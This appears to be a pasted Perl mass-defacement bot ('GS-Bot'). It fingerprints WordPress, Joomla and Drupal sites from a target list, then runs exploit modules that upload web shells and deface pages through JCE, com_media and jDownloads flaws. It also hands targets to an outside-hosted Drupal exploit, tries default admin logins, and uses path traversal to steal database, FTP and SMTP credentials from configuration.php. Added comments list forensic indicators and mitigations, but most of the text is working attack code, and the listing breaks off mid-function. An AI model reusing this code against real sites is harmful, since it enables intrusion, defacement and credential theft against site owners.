
Untitled

a guest
Sep 5th, 2016
  1. #!/usr/bin/perl
  2. #First Big Deface Proget GS-Bot 2015 © Coded By | Fallag Gassrini | Tunisian Fallaga Team |
  3. #The Code 4 Palestine The Love 4 Palestine and Life 4 For Palestine
  4. #Hello Hater'z :* on This script you wil find :
  5. #Auto cms detect
  6. #[DRUPAL]
  7. #[COM_ADS MANAGER] upload shell + index
  8. #[COM_USER SCANNER]
  9. #[COM_JCE] upload deface pic
  10. #[COM_MEDIA] upload shell + index
  11. #[COM_BLOG SCANNER]
  12. #[COM_JDOWNLOADS] upload shell + index
  13. #[COM_HDFLVPLAYER] download config
  14. #[COM_FABRIC] upload shell + index
  15. #wordpress
  16. #[WYSIJA] upload shell + index
  17. #[GRAVITY FORMS] upload shell + index
  18. #[REVSLIDER ] upload shell + index
  19. #[REVSLIDER GETCONFIG] Get config and try to login with password on panel admin
  20. #[PMA SCANER]
  21. #[REVSLIDER GET CPANEL]
  22. #[REVSLIDER AJAX DEFACE]
  23. # auto post on zone-h & mirror zone ///////////////// here want to say they update da mirror zone with a fucking captcha :/ so i will update it on 2016 inshallah in the V2 of this Bot :)
  24. # tmp folder Will content The scaned websites
  25. # All Result Will be Placed on Result Folder
  26. #Don't Change da Damn Fucking Right Madafaking Bitch Lamerz
  27. #Changing da Fucking Right Won't Make You da facking Real Coder Madafaka
  28. #If You want You can use da script but you dont need to play it da fucking smart Coder
  29. # Don't Use It Against Tunisian And Muslims Websites :)
  30. #Thanks to :Tounsi TNT
  31. #Greetz All Fallaga Team members all Muslims Every where
  32. # Fallag Gassrini Page :> https://www.facebook.com/gassrini.gov.tn/
  33.  
  34.  
  35. use HTTP::Request;
  36. use LWP::UserAgent;
  37. use IO::Select;
  38. use HTTP::Response;
  39. use Term::ANSIColor;
  40. use HTTP::Request::Common qw(POST);
  41. use HTTP::Request::Common qw(GET);
  42. use URI::URL;
  43. use IO::Socket::INET;
  # Working directories, created in the current directory when absent.
  # "tmp" receives the per-CMS site lists written by efrez(); "Result" receives
  # the findings files written by the modules (vulntargets.txt, shells.txt,
  # databases.txt, Drupal.txt).
  # Forensic note: these directory and file names are the on-disk traces to look
  # for on a host suspected of having run this tool.
  44. my $datetime = localtime;
  45. $tmp="tmp";
  46. if (-e $tmp)
  47. {
  48. }
  49. else
  50. {
  51. mkdir $tmp or die "Error creating directory: $tmp";
  52. }
  53.  
  54. $rez="Result";
  55. if (-e $rez)
  56. {
  57. }
  58. else
  59. {
  60. mkdir $rez or die "Error creating directory: $rez";
  61. }
  62.  
  63. $logo="
  64. ':llcodddddoodddddddddolll;.
  65. 'cldxdx0NMXd,. .';cox0WWXOxddoll'
  66. 'lodd0WMMNd;..,clc:::::;,,,;cddxOXMWOoood;
  67. 'oddkNMMMKo' .:l:.. 'OMMMKdddo. .
  68. ;xdxXMMMMMl .:lc. cMMMMMKddd' ....'
  69. ,OdxWMMMMMMx;oc. cMMMMMMMNodx. ........'
  70. .xxdNMWK0KMMNd' ';;;;,,'. ...'',;dN0KXNNWWN0:k;...'''........,
  71. '0oKMMX;.;;dW,': .:dkOxlcccclloddollc;,..;'...''''''lddxdc''........,
  72. ;0oNMMW; lMXo 'cloc'. .;coc.......;kd0NXWW0,'.......,
  73. :0oWMMW; ON0.. xWk,. ..',:ccc;. ,.......dlxWKcoNWo'''.....'
  74. 'KoWMMMx ,WXx:'O:...',clccloxkO0XNWx,.. :.......;kokXXXN0;''''''.'.
  75. .KoNMMMK. kk. oo. dk0WMMMMMM0c. odc;'....'lddxxl,'''''..
  76. okkWWWO. oWk..k, c:l: .OMMMMo' cOc. ;MMMMWXKOkkxxxkcd:
  77. .XlNx. .OWWWKdKo.. .xO0Oxo. KMMMWWMMMMM0;;::;:kMMMMMMMMMMMMMMXl0
  78. cKdMN, .dxxKWWN:,clc''OMMMMMMNkWW0xooooxd;'... kMMMMMMMMMMMMMMMcX.
  79. dkkK' ..:. xMWN. ,0WMMMMNOo,. .',dkoxMMMMMMMMMMMMMMMoK;
  80. xk, ON; .lWWWX'. .x0l,. ;oc' xckMMMMMMMMMMMMMo0:
  81. dk. .OMMW0NMMXxl:;;;:ok. :o; .k: :MMMMMMMMMMMMMoK;
  82. :K. .oWMMMMMMWd''''''''',;;' 'cll. .lo. ;MMMMMMMMMMMMMcX.
  83. .X;cOWMMMMMMMX:''''''''''''',;::::clollc:' .;lo:. lMMN0WMMMMMMMXlO
  84. dkOMMMMW00xd,''''',oocc'''''',l:;'......';;:;. 0Nc :NMMMMMo0,
  85. .KlNMMMXxKd';oxxdkN: ;'''''''''',,,;cclc. oc OMMMMKlk
  86. ,KoWMMMW0O0Ol,. ld :X0;'''''''''''''''';' ..;ld: .kcdXXc0.
  87. c0dWMMWO: co :XMMMWx'''''''''''''''':x::xWXl cd. .0.
  88. :0d0l. x:'dNMMMMMMMK:''''''''''''''',xKd' .0: .0'
  89. ;0,. kc0MMMMMMMMMMMMXxl;''''''''''''l. .o. ;k.
  90. .kd. .NWMMMMMMMMMMMMMMMMMNl.,'''''''': .l: .xl
  91. ,k:. kMMMMMMMMMMMMMMMMMN; ''''''''': ;d. lk.
  92. ;d:. .NMMMMMMMMMMMMMMWx. ,'''''''': o, .lx,
  93. .oo,cKMMMMMMMMMMMMK' ,.''''',; c. ,oo'
  94. :ooclkXMMMMMMWd .,'''';,. .,od;
  95. ;lcc::cdOk, ;'.... .,ccc,
  96. .:cc::;'.. ..';cc::;.
  97. 'cx00kxO00KX0xc,.
  98. ";
  99.  
  # Banner output followed by the main loop.
  # The file named by the first command-line argument is read one line at a
  # time; each line is treated as a site, and an entry that does not contain
  # "http://" is wrapped as "http://<entry>/". The value is stored in the package
  # global $site, which efrez() and every module it calls read directly
  # (efrez() is invoked with no arguments).
  100. print $logo;
  101. print "\t";
  102. print colored ("[ Code 4 Palestine |",'white on_black');
  103. print colored (" Love 4 Palestine |",'white on_green');
  104. print colored ("Life 4 Palestine ]",'white on_red'),"\n";
  105. print colored("[ GS-Bot Bazooka |Coded By Fallag Gassrini | Tunisian Fallaga Team ]",'white on_blue'),"\n\n\n";
  106. print colored ("Start At $datetime",'white on_red'),"\n\n";
  107.  
  108. open(tarrget,"<$ARGV[0]") or die "Fuck you where is Website list -_- mafaka \n";
  109. while(<tarrget>){
  110. chomp($_);
  111. $site = $_;
  112. if($site !~ /http:\/\//) { $site = "http://$site/"; };
  113. efrez();
  114. }
  # efrez: CMS fingerprinting and dispatch.
  # Fetches the global $site once and classifies it by substrings in the
  # response body (WordPress, Joomla, Drupal, otherwise UNKNOWN). A matched site
  # is appended to tmp/wordpress.txt, tmp/joomla.txt or tmp/Drupal.txt and the
  # module subs for that CMS are called in a fixed order.
  # wysija(), gravity() and revshell() are not defined in the visible part of
  # the listing.
  # Detection note: the request carries the fixed Chrome/26 User-Agent set
  # below. In access logs, a homepage fetch with that User-Agent followed by
  # requests to several unrelated component paths from the same client is
  # consistent with this scanner.
  115. sub efrez($site){
  116. $ua = LWP::UserAgent->new(keep_alive => 1);
  117. $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
  118. $ua->timeout (10);
  119.  
  120. my $efreez = $ua->get("$site")->content;
  121. if($efreez =~/wp-content\/themes\/|wp-content\/plugins\/|wordpress/) {
  122. print colored("[WORDPRESS] $site",'white on_magenta'),"\n\n\n";
  123. open(save, '>>tmp/wordpress.txt');
  124. print save "$site\n";
  125. close(save);
  126. wysija();
  127. gravity();
  128. revshell();
  129. }
  130.  
  131. elsif($efreez =~/<script type=\"text\/javascript\" src=\"\/media\/system\/js\/mootools.js\"><\/script>|Joomla!|Joomla|joomla/) {
  132. print colored("[JOOMLA] $site",'white on_magenta'),"\n\n\n";
  133. open(save, '>>tmp/joomla.txt');
  134. print save "$site\n";
  135. close(save);
  136. comadsmanegr();
  137. comusers();
  138. comjce();
  139. comediashell();
  140. comediaindex();
  141. comblog();
  142. comjdowloads();
  143. hdflvplayer();
  144. comfabr();
  145. indecomfabr();
  146. }
  147.  
  148. elsif($efreez =~/\/modules\/system\/system.menus.css|\/sites\/default\/files\/|<meta name=\"Generator\" content=\"Drupal 7/) {
  149. print colored("[DRUPAL] $site",'white on_magenta'),"\n\n\n";
  150. fuckdrupal();
  151.  
  152. open(save, '>>tmp/Drupal.txt');
  153. print save "$site\n";
  154. close(save);
  155. }else{
  156. print "\n[UNKNOWN] $site\n";
  157. }
  158. }
  159.  
  160.  
  161. ####################################################################################################################
  162. ####################################################################################################################
  163. ######################################### DRUPAL ##################################################################
  164. ####################################################################################################################
  # Drupal module.
  # The exploitation step is not in this file: the sub hands the target URL to a
  # PHP script hosted on a third-party site ($drupalink) and only looks for
  # "Success!" in that script's reply. What the remote script does cannot be
  # determined from this listing; every target is disclosed to whoever controls
  # that host.
  # The result is then checked by POSTing the Drupal login form: first as
  # "gassrini"/"admin", and when the remote script did not report success, as
  # "admin"/"admin". An HTTP 302 status is treated as a successful login and
  # recorded in Result/Drupal.txt.
  # Defender note: indicators visible here are a Drupal account named
  # "gassrini", POSTs to /user/login with an empty form_build_id, and the
  # 2001-era Gecko User-Agent. Mitigation is a patched Drupal core, an audit of
  # the users table for unexpected accounts, and no default admin password.
  165. sub fuckdrupal(){
  166.  
  167. $ua = LWP::UserAgent->new(keep_alive => 1);
  168. $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
  169. $ua->timeout (20);
  170.  
  171. # check the link of the exploit or you can download script from here : http://pastebin.com/wPAbtyJ4 and you upload it on you one shell :)
  172. $drupalink = "http://mltproductions.nl/gb.php";
  173. my $exploit = "$drupalink?url=$site&submit=submit";
  174. my $checkk = $ua->get("$exploit")->content;
  175. if($checkk =~/Success!/) {
  176. print colored ("[DRUPAL EXPLOIT]",'white on_red');
  177. print " ............... ";
  178. print color('bold white');
  179. print "[";
  180. print color('reset');
  181. print color('bold green');
  182. print "VULN";
  183. print color('reset');
  184. print color('bold white');
  185. print "] \n";
  186. print color('reset');
  187.  
  188. print "[WAIT I WILL MAKE SURE ABOUT USER AND PASSWORD]\n";
  189. # // here to test the user name and the password if the website has been really fucked or not :p
  190. $admin ="gassrini";
  191. $pass ="admin";
  192. $wp = $site . '/user/login';
  193. $red = $site . '/user/1';
  194. print "$wp\n";
  195.  
  196. $brute = POST $wp, [name => $admin, pass => $pass, form_build_id =>'', form_id => 'user_login',op => 'Log in', location => $red];
  197. $response = $ua->request($brute);
  198. $stat = $response->status_line;
  199. if ($stat =~ /302/){
  200. print colored ("[BOOM] $site => User | $admin Password | $pass",'white on_yellow'),"\n";
  201. open(save, '>>Result/Drupal.txt');
  202. print save "Success Gass ! $site | username : gassrini | pass: admin\n";
  203. close(save);
  204. }
  205. elsif ($stat =~ /404/){
  206. print "[NOT DRUPAL] .................. [ERROR]\n";
  207. }
  208. }else{
  209. # // here to test user: admin and password : admin on the panel admin
  210. print "[TRYING WITH USER AND PASSWORD ADMIN]\n";
  211. $admin="admin";
  212. $pass ="admin";
  213. $dr = $site . '/user/login';
  214. $brute = POST $dr, [name => $admin, pass => $pass, form_build_id =>'', form_id => 'user_login',op => 'Log in'];
  215. $response = $ua->request($brute);
  216. $stat = $response->status_line;
  217. if ($stat =~ /302/){
  218.  
  219. print colored ("[BOOM] $site=> User | $admin Password | $pass",'white on_yellow'),"\n";
  220.  
  221. open(save, '>>Result/Drupal.txt');
  222.  
  223. print save "Success Gass ! $site | username : $admin | pass: $pass\n";
  224.  
  225. close(save);
  226. }else{
  227. print "[DRUPAL] ...................... ";
  228. print color('bold white');
  229. print "[";
  230. print color('reset');
  231. print color('bold red');
  232. print "ERROR";
  233. print color('reset');
  234. print color('bold white');
  235. print "] \n";
  236. print color('reset');
  237.  
  238. }
  239.  
  240. }
  241. }
  242.  
  243.  
  244.  
  245. ####################################################################################################
  246. ####################################################################################################
  247. ###################################### JCE ###################################################
  248. ####################################################################################################
  249. ####################################################################################################
  # Joomla JCE module.
  # Probes the JCE image-manager endpoint ($exploiturl) and classifies the site
  # as vulnerable when the body contains "No function call specified!"; the site
  # is then logged to Result/vulntargets.txt. A multipart POST to the same URL
  # uploads the local file gass.gif with an 'upload-dir' of './../../', and the
  # result is checked by requesting $site/gass.gif and looking for a 200 status.
  # The IO::Socket::INET handle $remote is created but not read anywhere in this
  # sub.
  # zoneh() and mirrorzon() are defined outside the visible listing; going by
  # the file header they submit $def to defacement archives (not verifiable
  # from here).
  # Defender note: indicators are a file named gass.gif in the web root and
  # requests to the option=com_jce ... plugin=imgmanager URL with the 2001-era
  # Gecko User-Agent. Mitigation is updating or removing JCE.
  250. sub comjce($site){
  251. print colored ("[COM JCE]",'white on_red');
  252. $ua = LWP::UserAgent->new();
  253. $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
  254. $ua->timeout(15);
  255.  
  256.  
  257. $exploiturl="/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20";
  258.  
  259. $vulnurl=$site.$exploiturl;
  260. $res = $ua->get($vulnurl)->content;
  261. if ($res =~ m/No function call specified!/i){
  262. open(save, '>>Result/vulntargets.txt');
  263. print save "[JCE] $site\n";
  264. close(save);
  265.  
  266. print " .................. ";
  267. print color('bold white');
  268. print "[";
  269. print color('reset');
  270. print color('bold green');
  271. print "VULN JCE";
  272. print color('reset');
  273. print color('bold white');
  274. print "] ";
  275. print color('reset');
  276. print "\n[UPLOADING PICTURE]";
  277. my $res = $ua->post($vulnurl,
  278. Content_Type => 'form-data',
  279. Content => [
  280. 'upload-dir' => './../../',
  281. 'upload-overwrite' => 0,
  282. 'Filedata' => ["gass.gif"],
  283. 'action' => 'upload'
  284. ]
  285. )->decoded_content;
  286. if ($res =~ m/"error":false/i){
  287.  
  288. }else{
  289. print " ......... ";
  290. print color('bold white');
  291. print "[";
  292. print color('reset');
  293. print color('bold green');
  294. print "PATCHED";
  295. print color('reset');
  296. print color('bold white');
  297. print "] \n";
  298. print color('reset');
  299. }
  300.  
  301. $remote = IO::Socket::INET->new(
  302. Proto=>'tcp',
  303. PeerAddr=>"$site",
  304. PeerPort=>80,
  305. Timeout=>15
  306. );
  307. $def= "$site/gass.gif";
  308. $check = $ua->get($def)->status_line;
  309. if ($check =~ /200/){
  310. print " ......... ";
  311. print color('bold white');
  312. print "[";
  313. print color('reset');
  314. print color('bold green');
  315. print "DEFACED";
  316. print color('reset');
  317. print color('bold white');
  318. print "] \n";
  319. print color('reset');
  320. print "[LINK] => $def\n";
  321. zoneh();
  322. mirrorzon();
  323. }
  324. }else{print " .................. ";
  325. print color('bold white');
  326. print "[";
  327. print color('reset');
  328. print color('bold red');
  329. print "NOT VULN";
  330. print color('reset');
  331. print color('bold white');
  332. print "] \n";
  333. print color('reset');
  334. }
  335.  
  336. }
  337. ####################################################################################################
  338. ####################################################################################################
  339. ################################# COM MEDIA ######################################################
  340. ####################################################################################################
  341. ####################################################################################################
  # Joomla com_media module, first pass.
  # Requests the com_media image view ($tarmedia) without logging in. When the
  # response contains the upload form, the form's action URL is extracted and
  # the local file gass.PhP.txt is posted to it; the sub then requests
  # $site/images/gass.PhP.txt and $site/gass.html.
  # The success test passes on the marker "gassrini" OR on any successful HTTP
  # response, so an entry in Result/shells.txt is not by itself proof that a
  # file was written.
  # $tarmedia is a package global and is read again by comediaindex().
  # Defender note: indicators are files named gass.PhP.txt under /images/ and
  # gass.html in the web root, plus requests for the com_media view carrying the
  # Firefox/3.5 User-Agent set below. Mitigation is keeping the media manager
  # behind authentication, rejecting mixed-case and double extensions on upload,
  # and denying script execution in upload directories.
  342. sub comediashell($site){
  343. print "\n";
  344. print colored ("[COM MEDIA]",'white on_red');
  345. $tarmedia="$site/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=";
  346. $shlez = "gass.PhP.txt";
  347. $shlz="$site/images/gass.PhP.txt";
  348. $index="$site/gass.html";
  349. $ua = LWP::UserAgent->new;
  350. $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5");
  351. $sorm = $ua->get($tarmedia);
  352. $karza = $sorm->content;
  353. if($karza =~/<form action="(.*?)" id=\"uploadForm\" class=\"form-horizontal\" name=\"uploadForm\" method=\"post\" enctype=\"multipart\/form-data\">/ || $karza =~ /<form action="(.*?)" id=\"uploadForm\" name=\"uploadForm\" method=\"post\" enctype=\"multipart\/form-data\">/ )
  354. {
  355. $url = $1;
  356. $url =~ s/&amp;/&/gi;
  357. print " .................... [VULN]\n[UPLOADING SHELL]";
  358. open(save, '>>Result/vulntargets.txt');
  359. print save "[Media] $site\n";
  360. close(save);
  361. my $res = $ua->post($url, Content_Type => 'form-data', Content => [ Filedata => [$shlez] ]);
  362. $check = $ua->get($shlz);
  363. if($check->content =~/gassrini/ || $check->is_success ) {
  364. print" ........... ";
  365. print color('bold white');
  366. print "[";
  367. print color('reset');
  368. print color('bold green');
  369. print "SUCCESS";
  370. print color('reset');
  371. print color('bold white');
  372. print "] \n";
  373. print color('reset');
  374. print colored ("[SHELL LINK] => $shlz",'white on_yellow'),"\n";
  375. open (TEXT, '>>Result/shells.txt');
  376. print TEXT "\n[ COM MEDIA SHELL] =>$shlz \n";
  377. close (TEXT);
  378. my $checkndex = $ua->get("$index")->content;
  379. if($checkndex=~/Hacked/){
  380. $def="$index";
  381.  
  382. print colored ("[INDEX LINK] => $def",'white on_yellow'),"\n";
  383. zoneh();
  384. mirrorzon()
  385. }
  386.  
  387. }
  388. }else{print " ................ ";
  389. print color('bold white');
  390. print "[";
  391. print color('reset');
  392. print color('bold red');
  393. print "NOT VULN";
  394. print color('reset');
  395. print color('bold white');
  396. print "] \n";
  397. print color('reset');
  398. }
  399. }
  400. ########################################## INDEX ###################################################
  # Joomla com_media module, second pass.
  # Repeats the upload-form discovery against $tarmedia, a package global this
  # sub does not assign itself (it is set in comediashell()). The local file
  # gass.txt is posted to the extracted form action and $site/images/gass.txt is
  # requested afterwards. As in the first pass, the check passes on the marker
  # "Hacked" OR on any successful HTTP response.
  # zoneh() and mirrorzon() are defined outside the visible listing.
  # Defender note: the artefact to look for is /images/gass.txt.
  401. sub comediaindex(){
  402. $shlez = "gass.txt";
  403. $shlz="$site/images/gass.txt";
  404. #$index="$site/gass.html";
  405. $ua = LWP::UserAgent->new;
  406. $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5");
  407. $sorm = $ua->get($tarmedia);
  408. $karza = $sorm->content;
  409. if($karza =~/<form action="(.*?)" id=\"uploadForm\" class=\"form-horizontal\" name=\"uploadForm\" method=\"post\" enctype=\"multipart\/form-data\">/ || $karza =~ /<form action="(.*?)" id=\"uploadForm\" name=\"uploadForm\" method=\"post\" enctype=\"multipart\/form-data\">/ )
  410. {
  411. $url = $1;
  412. $url =~ s/&amp;/&/gi;
  413. print "\n[UPLOADING INDEX]";
  414. my $res = $ua->post($url, Content_Type => 'form-data', Content => [ Filedata => [$shlez] ]);
  415. $check = $ua->get($shlz);
  416. if($check->content =~/Hacked/ || $check->is_success ) {
  417. print " ........... ";
  418. print color('bold white');
  419. print "[";
  420. print color('reset');
  421. print color('bold green');
  422. print "DEFACED";
  423. print color('reset');
  424. print color('bold white');
  425. print "] \n";
  426. print color('reset');
  427.  
  428. print colored ("[INDEX LINK] => $shlz",'white on_yellow'),"\n";
  429. $def="$shlz";
  430. zoneh();
  431. mirrorzon()
  432. }
  433.  
  434. }
  435. }
  436. ####################################################################################################
  437. ####################################################################################################
  438. #########################################jdownloads ###############################################
  439. ####################################################################################################
  440. ####################################################################################################
  441.  
  # Joomla jDownloads module.
  # Posts the jDownloads upload form ($jdup) with two local files: gassrini.rar
  # in the file_upload field and gassrini.php.php.j in the pic_upload field. The
  # site is treated as vulnerable when the reply contains "The file was
  # successfully transferred to the server"; it is then logged to
  # Result/vulntargets.txt and /images/jdownloads/screenshots/gassrini.php.j is
  # requested and searched for the marker "Fallagassrini".
  # A second POST sends gass.rar and gass.html.j, after which
  # /images/jdownloads/screenshots/gass.html.j is requested and a 200 status is
  # taken as success.
  # This user agent is created with verify_hostname => 0, so TLS certificate
  # hostname checks are disabled for its requests.
  # zoneh() and mirrorzon() are defined outside the visible listing.
  # Defender note: indicators are files ending in ".j" (or the names above)
  # under images/jdownloads/screenshots/, and upload POSTs carrying the fixed
  # form values seen below (name, mail, filetitle). Mitigation is updating
  # jDownloads, disabling anonymous uploads, and denying script execution in the
  # screenshots directory.
  442. sub comjdowloads($site){
  443. print colored ("[COM JDOWNLOADS]",'white on_red');
  444. $file="gassrini.rar";
  445. $filez="gassrini.php.php.j";
  446. $jdup= $site . 'index.php?option=com_jdownloads&Itemid=0&view=upload';
  447. $shellpath= $site . '/images/jdownloads/screenshots/gassrini.php.j';
  448.  
  449. my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
  450. $ua->timeout(10);
  451. $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
  452.  
  453. my $exploit = $ua->post("$jdup", Cookie => "", Content_Type => "form-data", Content => [ name=>"Fallag Gassrini", mail=>"fallagassrini@gmail.com", filetitle =>"Fallaga Team", catlist=>"1", license=>"0", language=>"0", system=>"0",file_upload=>["$file"], pic_upload=>["$filez"], description=>"<p>zot</p>", senden=>"Send file", option=>"com_jdownloads", view=>"upload", send=>"1", "24c22896d6fe6977b731543b3e44c22f"=>"1"]);
  454.  
  455. if ($exploit->decoded_content =~ /The file was successfully transferred to the server/) {
  456. print " ............... ";
  457. print color('bold white');
  458. print "[";
  459. print color('reset');
  460. print color('bold green');
  461. print "VULN";
  462. print color('reset');
  463. print color('bold white');
  464. print "] \n";
  465. print color('reset');
  466. open(save, '>>Result/vulntargets.txt');
  467. print save "[jdown] $site\n";
  468. close(save);
  469.  
  470. print "[SCANING SHELL] ................ ";
  471. print color('bold white');
  472. print "[";
  473. print color('reset');
  474. print color('bold blue');
  475. print "WAIT";
  476. print color('reset');
  477. print color('bold white');
  478. print "] \n";
  479. print color('reset');
  480.  
  481. my $checkshell = $ua->get("$shellpath")->content;
  482. if($checkshell =~/Fallagassrini/) {
  483. print colored ("[SHELL LINK] => $shellpath",'white on_green'),"\n";
  484. open (TEXT, '>>Result/shells.txt');
  485. print TEXT "[ JDWN SHELL] => $shellpath\n";
  486. close (TEXT);
  487. }else{
  488. ##################################################################
  489. print "[ERROR] ................... ";
  490. print color('bold white');
  491. print "[";
  492. print color('reset');
  493. print color('bold red');
  494. print "SHELL 404";
  495. print color('reset');
  496. print color('bold white');
  497. print "] \n";
  498. print color('reset');
  499.  
  500. }
  501.  
  502. # // if shell not uploaded this will upload a gif index //
  503.  
  504. print "[JDOWNLOAD INDEX]";
  505.  
  506. $def = $site . '/images/jdownloads/screenshots/gass.html.j';
  507. $filee="gass.rar";
  508. $filezz="gass.html.j";
  509. my $exploitx = $ua->post("$jdup", Cookie => "", Content_Type => "form-data", Content => [ name=>"Fallag Gassrini", mail=>"fallagassrini@gmail.com", filetitle =>"Fallaga Team", catlist=>"1", license=>"0", language=>"0", system=>"0",file_upload=>["$filee"], pic_upload=>["$filezz"], description=>"<p>zot</p>", senden=>"Send file", option=>"com_jdownloads", view=>"upload", send=>"1", "24c22896d6fe6977b731543b3e44c22f"=>"1"]);
  510. if ($exploit->decoded_content =~ /The file was successfully transferred to the server/) {
  511. print " ................ ";
  512. print color('bold white');
  513. print "[";
  514. print color('reset');
  515. print color('bold green');
  516. print "OK";
  517. print color('reset');
  518. print color('bold white');
  519. print "] \n";
  520. print color('reset');
  521. print "[SCANING INDEX] ................";
  522. print color('bold white');
  523. print "[";
  524. print color('reset');
  525. print color('bold blue');
  526. print "WAIT";
  527. print color('reset');
  528. print color('bold white');
  529. print "] \n";
  530. print color('reset');
  531.  
  532.  
  533. my $response = $ua->get("$def")->status_line;
  534. if ($response =~ /200/){
  535. print "[DEFACE] .....................";
  536. print color('bold white');
  537. print "[";
  538. print color('reset');
  539. print color('bold green');
  540. print "SUCCESS";
  541. print color('reset');
  542. print color('bold white');
  543. print "] \n";
  544. print color('reset');
  545.  
  546. print colored ("[INDEX LINK] => $def",'white on_green'),"\n";
  547. zoneh();
  548. mirrorzon();
  549. }else{
  550. print "[DEFACE] .......................";
  551. print color('bold white');
  552. print "[";
  553. print color('reset');
  554. print color('bold red');
  555. print "ERROR";
  556. print color('reset');
  557. print color('bold white');
  558. print "] \n";
  559. print color('reset');
  560.  
  561. }
  562. }
  563. }else{ print " ........... ";
  564. print color('bold white');
  565. print "[";
  566. print color('reset');
  567. print color('bold red');
  568. print "NOT VULN";
  569. print color('reset');
  570. print color('bold white');
  571. print "] \n";
  572. print color('reset');
  573.  
  574. }
  575.  
  576. }
  577.  
  578.  
  579. ####################################################################################################
  580. ####################################################################################################
  581. ######################################COM hdflvplayer##############################################
  582. ####################################################################################################
  583. ####################################################################################################
  # Joomla com_hdflvplayer module (configuration disclosure).
  # Requests the component's download.php with f=../../../configuration.php, a
  # path traversal that asks the component to return Joomla's configuration
  # file. The site is treated as vulnerable when the reply contains
  # "class JConfig" or "mosConfig_offline_message" and is logged to
  # Result/vulntargets.txt.
  # The reply is then searched with one regex per setting and each match is
  # printed and appended in clear text to Result/databases.txt: database user,
  # password, name and host; FTP host, port, user and password; SMTP user,
  # password, port and host.
  # Defender note: a successful response to a request for this download.php
  # path with "../" in the f parameter means configuration.php should be
  # treated as disclosed. Rotate every secret it holds (database, FTP and SMTP
  # credentials) and update or remove the component. The request carries the
  # 2001-era Gecko User-Agent set below.
  584. sub hdflvplayer($site){
  585.  
  586. # // here for download config but i have to add download cpanel information :p //
  587.  
  588. print colored ("[HDFLVPLAYER]",'white on_red');
  589. $conflink = "$site/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php";
  590. $ua = LWP::UserAgent->new(keep_alive => 1);
  591. $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
  592. $ua->timeout (10);
  593. $resp = $ua->request(HTTP::Request->new(GET => $conflink));
  594. $cont = $resp->content;
  595. if($cont =~ m/class JConfig|mosConfig_offline_message/g){
  596. print " .................. ",
  597. print color('bold white');
  598. print "[";
  599. print color('reset');
  600. print color('bold green');
  601. print "VULN";
  602. print color('reset');
  603. print color('bold white');
  604. print "] \n";
  605. print color('reset');
  606. open(save, '>>Result/vulntargets.txt');
  607. print save "[hdflv] $site\n";
  608. close(save);
  609.  
  610.  
  611.  
  612.  
  613. open (TEXT, '>>Result/databases.txt');
  614. print TEXT "$site\n[+]DATABASE INFO\n";
  615. close (TEXT);
  616. print color("white"),"\t[+]DATABASE INFO\n";
  617. if ($cont =~ /user = \'(.*?)\';/){
  618. print color("red"),"\t[-]Database User = $1 \n";
  619. print color 'reset';
  620. open (TEXT, '>>Result/databases.txt');
  621. print TEXT "[-]Database User = $1 \n";
  622. close (TEXT);
  623. }
  624. if ($cont =~ /password = \'(.*?)\';/){
  625. print color("red"),"\t[-]Database Password = $1 \n";
  626. print color 'reset';
  627. open (TEXT, '>>Result/databases.txt');
  628. print TEXT "[-]Database Password = $1\n";
  629. close (TEXT);
  630. }
  631. if ($cont =~ /db = \'(.*?)\';/){
  632. print color("red"),"\t[-]Database Name = $1 \n";
  633. print color 'reset';
  634. open (TEXT, '>>Result/databases.txt');
  635. print TEXT "[-]Database Name = $1\n";
  636. close (TEXT);
  637. }
  638. if ($cont =~ /host = \'(.*?)\';/){
  639. print color("red"),"\t[-]Database Host = $1 \n";
  640. print color 'reset';
  641. open (TEXT, '>>Result/databases.txt');
  642. print TEXT "[-]Database Host = $1\n";
  643. close (TEXT);
  644. }
  645.  
  646.  
  647. print color("white"),"\t[+] FTP INFO\n";
  648. if ($cont =~ /ftp_host = \'(.*?)\';/){
  649. print color("red"),"\t[-]FTP Host = $1 \n";
  650. print color 'reset';
  651. open (TEXT, '>>Result/databases.txt');
  652. print TEXT "\n[+] FTP INFO\n[-]FTP Host = $1\n";
  653. close (TEXT);
  654. }
  655. if ($cont =~ /ftp_port = \'(.*?)\';/){
  656. print color("red"),"\t[-]FTP Port = $1 \n";
  657. print color 'reset';
  658. open (TEXT, '>>Result/databases.txt');
  659. print TEXT "[-]FTP Port = $1\n";
  660. close (TEXT);
  661. }
  662. if ($cont =~ /ftp_user = \'(.*?)\';/){
  663. print color("red"),"\t[-]FTP User = $1 \n";
  664. print color 'reset';
  665. open (TEXT, '>>Result/databases.txt');
  666. print TEXT "[-]FTP User = $1\n";
  667. close (TEXT);
  668. }
  669. if ($cont =~ /ftp_pass = \'(.*?)\';/){
  670. print color("red"),"\t[-]FTP Pass = $1 \n";
  671. print color 'reset';
  672. open (TEXT, '>>Result/databases.txt');
  673. print TEXT "[-]FTP Pass = $1\n\n";
  674. close (TEXT);
  675. }
  676.  
  677.  
  678.  
  679. print color("white"),"\t[+] SMTP INFO\n";
  680. if ($cont =~ /smtpuser = \'(.*?)\';/){
  681. print color("red"),"\t[-]SMTP User = $1 \n";
  682. print color 'reset';
  683. open (TEXT, '>>Result/databases.txt');
  684. print TEXT "[+] SMTP INFO\n[-]SMTP User = $1\n";
  685. close (TEXT);
  686. }
  687. if ($cont =~ /smtppass = \'(.*?)\';/){
  688. print color("red"),"\t[-]SMTP Password = $1 \n";
  689. print color 'reset';
  690. open (TEXT, '>>Result/databases.txt');
  691. print TEXT "[-]SMTP Password = $1\n";
  692. close (TEXT);
  693. }
